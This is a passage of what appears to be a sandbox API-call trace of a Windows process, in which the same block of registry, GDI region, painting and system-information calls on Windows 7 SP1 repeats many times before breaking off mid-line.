RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.785] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x7a0401d3 [0087.785] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x780401d6 [0087.785] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040b97 [0087.785] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040b98 [0087.785] CombineRgn (hrgnDst=0x1040b97, hrgnSrc1=0x7a0401d3, hrgnSrc2=0x780401d6, iMode=1) returned 1 [0087.785] CombineRgn (hrgnDst=0x1040b98, hrgnSrc1=0x7a0401d3, hrgnSrc2=0x780401d6, iMode=4) returned 2 [0087.785] CreateSolidBrush (color=0xff) returned 0x2100b96 [0087.785] CreateSolidBrush (color=0xff0000) returned 0x1100b99 [0087.785] DeleteObject (ho=0x1100b99) returned 1 [0087.785] DeleteObject (ho=0x780401d6) returned 1 [0087.785] DeleteObject (ho=0x7a0401d3) returned 1 [0087.785] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.785] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.785] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.785] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.785] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.785] BeginPath (hdc=0x0) returned 0 [0087.785] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.785] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.785] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.785] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.785] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.785] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.785] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.785] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.785] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x790401d6 [0087.785] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x7b0401d3 [0087.785] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040b9a [0087.785] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040b9b [0087.785] CombineRgn (hrgnDst=0x1040b9a, hrgnSrc1=0x790401d6, hrgnSrc2=0x7b0401d3, iMode=1) returned 1 [0087.785] CombineRgn (hrgnDst=0x1040b9b, hrgnSrc1=0x790401d6, hrgnSrc2=0x7b0401d3, iMode=4) returned 2 [0087.786] CreateSolidBrush (color=0xff) returned 0x2100b99 [0087.786] CreateSolidBrush (color=0xff0000) returned 0x1100b9c [0087.786] DeleteObject (ho=0x1100b9c) returned 1 [0087.786] DeleteObject (ho=0x7b0401d3) returned 1 [0087.786] DeleteObject (ho=0x790401d6) returned 1 [0087.786] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.786] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.786] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.786] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.786] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.786] BeginPath (hdc=0x0) returned 0 [0087.786] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.786] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.786] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.786] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.786] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.786] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.786] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.786] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.786] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x7c0401d3 [0087.786] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x7a0401d6 [0087.786] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040b9d [0087.786] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040b9e [0087.786] CombineRgn (hrgnDst=0x1040b9d, hrgnSrc1=0x7c0401d3, hrgnSrc2=0x7a0401d6, iMode=1) returned 1 [0087.786] CombineRgn (hrgnDst=0x1040b9e, hrgnSrc1=0x7c0401d3, hrgnSrc2=0x7a0401d6, iMode=4) returned 2 [0087.786] CreateSolidBrush (color=0xff) returned 0x2100b9c [0087.786] CreateSolidBrush (color=0xff0000) returned 0x1100b9f [0087.786] DeleteObject (ho=0x1100b9f) returned 1 [0087.786] DeleteObject (ho=0x7a0401d6) returned 1 [0087.786] DeleteObject (ho=0x7c0401d3) returned 1 [0087.786] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.786] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.786] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.786] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.786] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.786] BeginPath (hdc=0x0) returned 0 [0087.786] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.786] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.786] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.786] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.786] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.786] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.787] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.787] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.787] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x7b0401d6 [0087.787] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x7d0401d3 [0087.787] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040ba0 [0087.787] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040ba1 [0087.787] CombineRgn (hrgnDst=0x1040ba0, hrgnSrc1=0x7b0401d6, hrgnSrc2=0x7d0401d3, iMode=1) returned 1 [0087.787] CombineRgn (hrgnDst=0x1040ba1, hrgnSrc1=0x7b0401d6, hrgnSrc2=0x7d0401d3, iMode=4) returned 2 [0087.787] CreateSolidBrush (color=0xff) returned 0x2100b9f [0087.787] CreateSolidBrush (color=0xff0000) returned 0x1100ba2 [0087.787] DeleteObject (ho=0x1100ba2) returned 1 [0087.787] DeleteObject (ho=0x7d0401d3) returned 1 [0087.787] DeleteObject (ho=0x7b0401d6) returned 1 [0087.787] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.787] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.787] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.787] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.787] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.787] BeginPath (hdc=0x0) returned 0 [0087.787] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.787] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.787] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.787] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.787] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.787] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.787] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.787] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.787] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x7e0401d3 [0087.787] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x7c0401d6 [0087.787] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040ba3 [0087.787] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040ba4 [0087.787] CombineRgn (hrgnDst=0x1040ba3, hrgnSrc1=0x7e0401d3, hrgnSrc2=0x7c0401d6, iMode=1) returned 1 [0087.787] CombineRgn (hrgnDst=0x1040ba4, hrgnSrc1=0x7e0401d3, hrgnSrc2=0x7c0401d6, iMode=4) returned 2 [0087.787] CreateSolidBrush (color=0xff) returned 0x2100ba2 [0087.787] CreateSolidBrush (color=0xff0000) returned 0x1100ba5 [0087.787] DeleteObject (ho=0x1100ba5) returned 1 [0087.788] DeleteObject (ho=0x7c0401d6) returned 1 [0087.788] DeleteObject (ho=0x7e0401d3) returned 1 [0087.788] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.788] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.788] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.788] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.788] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.788] BeginPath (hdc=0x0) returned 0 [0087.788] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.788] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.788] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.788] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.788] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.788] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.788] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.788] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.788] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x7d0401d6 [0087.788] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x7f0401d3 [0087.788] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040ba6 [0087.788] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040ba7 [0087.788] CombineRgn (hrgnDst=0x1040ba6, hrgnSrc1=0x7d0401d6, hrgnSrc2=0x7f0401d3, iMode=1) returned 1 [0087.788] CombineRgn (hrgnDst=0x1040ba7, hrgnSrc1=0x7d0401d6, hrgnSrc2=0x7f0401d3, iMode=4) returned 2 [0087.788] CreateSolidBrush (color=0xff) returned 0x2100ba5 [0087.788] CreateSolidBrush (color=0xff0000) returned 0x1100ba8 [0087.788] DeleteObject (ho=0x1100ba8) returned 1 [0087.788] DeleteObject (ho=0x7f0401d3) returned 1 [0087.788] DeleteObject (ho=0x7d0401d6) returned 1 [0087.788] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.788] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.788] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.788] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.788] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.788] BeginPath (hdc=0x0) returned 0 [0087.788] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.788] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.788] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.788] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.788] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.788] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.788] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.788] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.789] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x800401d3 [0087.789] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x7e0401d6 [0087.789] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040ba9 [0087.789] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040baa [0087.789] CombineRgn (hrgnDst=0x1040ba9, hrgnSrc1=0x800401d3, hrgnSrc2=0x7e0401d6, iMode=1) returned 1 [0087.789] CombineRgn (hrgnDst=0x1040baa, hrgnSrc1=0x800401d3, hrgnSrc2=0x7e0401d6, iMode=4) returned 2 [0087.789] CreateSolidBrush (color=0xff) returned 0x2100ba8 [0087.789] CreateSolidBrush (color=0xff0000) returned 0x1100bab [0087.789] DeleteObject (ho=0x1100bab) returned 1 [0087.789] DeleteObject (ho=0x7e0401d6) returned 1 [0087.789] DeleteObject (ho=0x800401d3) returned 1 [0087.789] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.789] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.789] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.789] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.789] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.789] BeginPath (hdc=0x0) returned 0 [0087.789] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.789] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.789] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.789] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.789] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.789] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.789] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.789] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.789] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x7f0401d6 [0087.789] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x810401d3 [0087.789] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040bac [0087.789] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040bad [0087.789] CombineRgn (hrgnDst=0x1040bac, hrgnSrc1=0x7f0401d6, hrgnSrc2=0x810401d3, iMode=1) returned 1 [0087.789] CombineRgn (hrgnDst=0x1040bad, hrgnSrc1=0x7f0401d6, hrgnSrc2=0x810401d3, iMode=4) returned 2 [0087.789] CreateSolidBrush (color=0xff) returned 0x2100bab [0087.789] CreateSolidBrush (color=0xff0000) returned 0x1100bae [0087.789] DeleteObject (ho=0x1100bae) returned 1 [0087.789] DeleteObject (ho=0x810401d3) returned 1 [0087.789] DeleteObject (ho=0x7f0401d6) returned 1 [0087.789] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.789] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.790] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.790] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.790] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.790] BeginPath (hdc=0x0) returned 0 [0087.790] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.790] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.790] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.790] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.790] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.790] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.790] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.790] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.790] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x820401d3 [0087.790] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x800401d6 [0087.790] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040baf [0087.790] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040bb0 [0087.790] CombineRgn (hrgnDst=0x1040baf, hrgnSrc1=0x820401d3, hrgnSrc2=0x800401d6, iMode=1) returned 1 [0087.790] CombineRgn (hrgnDst=0x1040bb0, hrgnSrc1=0x820401d3, hrgnSrc2=0x800401d6, iMode=4) returned 2 [0087.790] CreateSolidBrush (color=0xff) returned 0x2100bae [0087.790] CreateSolidBrush (color=0xff0000) returned 0x1100bb1 [0087.790] DeleteObject (ho=0x1100bb1) returned 1 [0087.790] DeleteObject (ho=0x800401d6) returned 1 [0087.790] DeleteObject (ho=0x820401d3) returned 1 [0087.790] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.790] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.790] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.790] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.790] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.790] BeginPath (hdc=0x0) returned 0 [0087.790] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.790] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.790] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.790] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.790] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.790] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.790] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.790] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.790] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x810401d6 [0087.790] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x830401d3 [0087.791] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040bb2 [0087.791] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040bb3 [0087.791] CombineRgn (hrgnDst=0x1040bb2, hrgnSrc1=0x810401d6, hrgnSrc2=0x830401d3, iMode=1) returned 1 [0087.791] CombineRgn (hrgnDst=0x1040bb3, hrgnSrc1=0x810401d6, hrgnSrc2=0x830401d3, iMode=4) returned 2 [0087.791] CreateSolidBrush (color=0xff) returned 0x2100bb1 [0087.791] CreateSolidBrush (color=0xff0000) returned 